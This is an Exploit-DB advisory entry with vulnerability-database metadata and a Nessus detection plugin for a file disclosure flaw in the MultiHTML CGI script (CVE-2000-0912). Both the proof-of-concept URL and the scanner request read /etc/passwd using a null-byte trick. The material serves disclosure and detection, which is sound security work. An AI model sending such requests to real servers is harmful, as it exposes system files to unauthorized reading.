source: http://www.securityfocus.com/bid/6711/info
MultiHTML is prone to a file disclosure vulnerability.
It is possible for remote attackers to issue requests which are capable of disclosing sensitive webserver readable resources on the system hosting the software.
http://www.example.com/cgi-bin/multihtml.pl?multi=/etc/passwd%00html
{"id": "EDB-ID:22204", "type": "exploitdb", "bulletinFamily": "exploit", "title": "MultiHTML 1.5 File Disclosure Vulnerability", "description": "MultiHTML 1.5 File Disclosure Vulnerability. CVE-2000-0912. Webapps exploit for cgi platform", "published": "2000-09-13T00:00:00", "modified": "2000-09-13T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/22204/", "reporter": "Niels Heinen", "references": [], "cvelist": ["CVE-2000-0912"], "lastseen": "2016-02-02T18:12:56", "viewCount": 8, "enchantments": {"score": {"value": 4.6, "vector": "NONE", "modified": "2016-02-02T18:12:56", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2000-0912"]}, {"type": "osvdb", "idList": ["OSVDB:415"]}, {"type": "nessus", "idList": ["MULTIHTML.NASL"]}], "modified": "2016-02-02T18:12:56", "rev": 2}, "vulnersScore": 4.6}, "sourceHref": "https://www.exploit-db.com/download/22204/", "sourceData": "source: http://www.securityfocus.com/bid/6711/info\r\n\r\nMultiHTML is prone to a file disclosure vulnerability.\r\n\r\nIt is possible for remote attackers to issue requests which are capable of disclosing sensitive webserver readable resources on the system hosting the software.\r\n\r\nhttp://www.example.com/cgi-bin/multihtml.pl?multi=/etc/passwd%00html", "osvdbidlist": ["415"]}
{"cve": [{"lastseen": "2020-10-03T11:36:57", "description": "MultiHTML CGI script allows remote attackers to read arbitrary files and possibly execute arbitrary commands by specifying the file name to the \"multi\" parameter.", "edition": 3, "cvss3": {}, "published": "2000-12-19T05:00:00", "title": "CVE-2000-0912", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2000-0912"], "modified": "2017-10-10T01:29:00", "cpe": ["cpe:/a:jcs_web_works:multihtml:*"], "id": "CVE-2000-0912", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0912", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:jcs_web_works:multihtml:*:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:19:55", "bulletinFamily": "software", "cvelist": ["CVE-2000-0912"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nISS X-Force ID: 5285\n[CVE-2000-0912](https://vulners.com/cve/CVE-2000-0912)\nBugtraq ID: 6711\n", "modified": "2000-09-13T00:00:00", "published": "2000-09-13T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:415", "id": "OSVDB:415", "type": "osvdb", "title": "MultiHTML multihtml.pl Traversal Arbitrary File Access", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "nessus": [{"lastseen": "2021-01-01T03:53:42", "description": "The 'multihtml.pl' CGI is installed. This CGI has a well known \nsecurity flaw that lets an attacker read arbitrary files on the remote\nhost through the 'multi' parameter.", "edition": 25, "published": "2000-09-16T00:00:00", "title": "MultiHTML multihtml.pl Traversal Arbitrary File Access", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2000-0912"], "modified": "2021-01-02T00:00:00", "cpe": [], "id": "MULTIHTML.NASL", "href": "https://www.tenable.com/plugins/nessus/10516", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(10516);\n script_version (\"1.28\");\n\n script_cve_id(\"CVE-2000-0912\");\n script_bugtraq_id(6711);\n\n script_name(english:\"MultiHTML multihtml.pl Traversal Arbitrary File Access\");\n script_summary(english:\"Checks for the presence of /cgi-bin/multihtml.pl\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server has a CGI application installed that is affected\nby an information disclosure vulnerability.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The 'multihtml.pl' CGI is installed. This CGI has a well known \nsecurity flaw that lets an attacker read arbitrary files on the remote\nhost through the 'multi' parameter.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2000/Sep/285\" );\n script_set_attribute(attribute:\"solution\", value:\n\"There is no known solution at this time.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:U/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2000/09/16\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2000/09/13\");\n script_cvs_date(\"Date: 2018/11/15 20:50:18\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2000-2018 Tenable Network Security, Inc.\");\n script_family(english:\"CGI abuses\");\n\n script_dependencie(\"http_version.nasl\", \"find_service1.nasl\", \"no404.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:80);\n\nforeach dir (cgi_dirs())\n{\n res = http_send_recv3(method:\"GET\", item:string(dir, \"multihtml.pl?multi=/etc/passwd%00html\"), port:port);\n if (isnull(res)) exit(1, \"The web server on port \"+port+\" failed to respond.\");\n \n if(egrep(pattern:\".*root:.*:0:[01]:.*\", string:res[2] )) security_warning(port);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}
